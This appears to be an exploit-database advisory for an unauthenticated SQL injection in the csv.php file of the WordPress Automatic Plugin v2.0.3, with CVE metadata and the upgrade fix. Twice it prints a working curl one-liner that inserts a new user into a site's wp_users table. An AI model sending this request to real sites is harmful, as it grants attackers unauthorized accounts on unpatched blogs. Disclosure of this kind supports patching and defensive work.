Wordpress Automatic Plugin v2.0.3 SQL Injection

vendor:

Wordpress Automatic Plugin

by:

Josiah Ryan

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Wordpress Automatic Plugin

Affected Version From: 2.0.3

Affected Version To: 2.0.3

Patch Exists: Yes

Related CWE: CVE-2012-3245

CPE: a:codecanyon:wordpress_automatic_plugin:2.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2012

WordPress Automatic Plugin v2.0.3 SQL Injection

The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries. Using this cURL command a user can send this POST data which will create a new login: $ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ('test', '123456', 'jblow@gmail.com') http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php

Mitigation:

Users are urged to upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

Title:
======
Wordpress Automatic Plugin v2.0.3 SQL Injection

Date:
=====
2012-06-15

Website:
===========
http://codecanyon.net/item/wordpress-automatic-plugin/1904470

Introduction:
=============
Wordpress automatic plugin posts quality targeted articles, Amazon Products, clickbank Products, Youtube Videos and feeds posts on auto-pilot. just install and leave, it will work 24/7* to blog for you . 

Exploit Details:
================
The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries

Using this cURL command a user can send this POST data which will create a new login:
$ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ('test', '123456', 'jblow@gmail.com') http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php

Fix:
====
The author of this plugin has released a fix for this vulnerability and users are urged to upgrade to v2.0.4.